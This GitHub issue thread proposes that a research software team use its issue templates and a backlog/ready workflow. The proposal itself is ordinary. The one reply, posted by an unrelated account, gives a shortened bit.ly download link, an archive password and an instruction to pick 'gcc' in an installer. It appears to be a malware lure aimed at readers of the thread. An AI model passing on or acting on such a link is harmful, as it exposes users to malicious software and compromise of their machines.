### ISSUE TITLE
[ENHANCEMENT] Start using feature request and issue templates

### ISSUE THREAD

**Issue by jamesturner246** [imperialCHEPI/healthgps#504]
## Feature request description

We have had templates for bug reports and feature requests for some time, but, thus far, have all neglected to use them. This has encouraged incomplete task descriptions, resulting in code that does not immediately fulfil all user requirements, taking time as we iteratively build a more complete picture as the week progresses. We can address this inefficiency by using the existing issue templates, starting now. We can adapt these templates to be more useful and relevant as we go.

## Describe the solution you'd like

When making issues on the project board, one can select an issue template by clicking on the plus `+` sign to the left of the *Add item* text box, and selecting the template for bug report or feature request, as appropriate, and filling out all sections with adequate information.

Putting an issue in the project board does not necessarily imply that work can begin on it immediately. Some back-and-forth should be expected, as details and ambiguities in the original description are discovered and resolved. During this phase, issues will have the grey `backlog` category, and work cannot begin until we are all satisfied the job can be complete based on the description. Then, and only then, an issue can be moved into the green `ready` category, ready to be allocated in the following sprint planning meeting.

## Describe alternatives you've considered

N/A

## Additional context

Step 1. Click the plus `+` button

![Image](https://github.com/user-attachments/assets/d28d8968-bd54-427c-b2e2-cbbcd1f601a8)

Step 2. Click `Create new issue`

![Image](https://github.com/user-attachments/assets/f7ae49dd-cfb9-4d4d-8a1d-a3bc7418880b)

Step 3. Select appropriate repository, and select one of our existing templates:

![Image](https://github.com/user-attachments/assets/0b4c2501-9536-4985-8dce-9820a69ec93a)

Step 4. Fill out all parts of the template with enough detail (or close to) that the feature can be completed without further info and revisions. Expect some further conversation to fill in the blanks. Large requests/bugs can (should) be split into multiple issues.

Issue templates can also be selected in the main 'Issues' page. We should review and update these templates somewhat regularly.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
